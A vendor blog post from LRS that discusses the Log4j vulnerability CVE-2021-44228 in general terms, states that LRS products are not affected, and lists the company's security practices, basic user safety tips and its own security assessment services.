Exploits and Vulnerabilities
Wednesday, December 15, 2021
by Guy Tucker
As each year goes by, I field more and more questions about the very real menace of common vulnerabilities and exposures, or CVE’s for short. I read about large corporations being shut down by ransomware, trojan horses or viruses every day. Individuals are worried. Corporations are worried. Hospitals and governments are worried. And of course, software companies are worried.
Just this week, the world learned about an exploit called log 4j vulnerability CVE-2021-44228. With this exploit, a simple logging mechanism can enable a hacker to insert their own code into a process and execute the code in a remote manner. This one is frightening. According to the CVE description, simply writing a line of text to a log can open the door. Software products need to write log entries for many legitimate reasons, so the nature of this exploit makes it both difficult to detect and tough to prevent.
The good news is that LRS products are not vulnerable to CVE-2021-44228, giving our customers one less exposure to worry about. A lucky thing, as there are many other critical systems they will need to protect.
Software companies constantly guard against malware attacks of all kinds. LRS developers remain very aware of paths to vulnerability and take a number of steps to avoid becoming the target of malicious exploits. Some of these measures include:
- Following industry best practices when writing product code such as the use of encryption at rest and encryption on the fly for all inter-process data.
- The use of best-of-breed software to scan our source code and avoid pitfalls.
- Adoption of the BSIMM model of Systems Security Development and Maturity.
- Continuous dynamic, static and penetration scanning and testing throughout the development process.
- Adoption of Zero-Trust methods of transport to ensure safety.
- Avoidance of operating system print spooling mechanisms, which are highly susceptible to both attack and failure (PrintNightmare and its many friends.)
- Constant monitoring of reported exploits to make sure our practices are effective.
There are steps you can take to help both you and your company in this area as well. Most of these you will have heard of, but it never hurts to remind others in your IT and user communities. To follow industry best practices, make sure to:
- Never open an attachment from a source you don’t know.
- Always stay current on operating system patches.
- Keep your LRS (and non-LRS) products as current as you are comfortable with.
- Consider adoption of Zero-Trust methods in your organization.
A more proactive approach to consider is a third-party security assessment by an external services firm. One such security provider is LRS IT Solutions, specifically their Foundational Cyber Risk Analysis offering. From vulnerability scanning to firewall configuration and penetration testing, they stand ready to act as a trusted outside advisor.
Printing can be challenging in a Zero Trust environment, but LRS has the tools and experience to make this a reality. Considering the alternative, it is certainly worth the effort.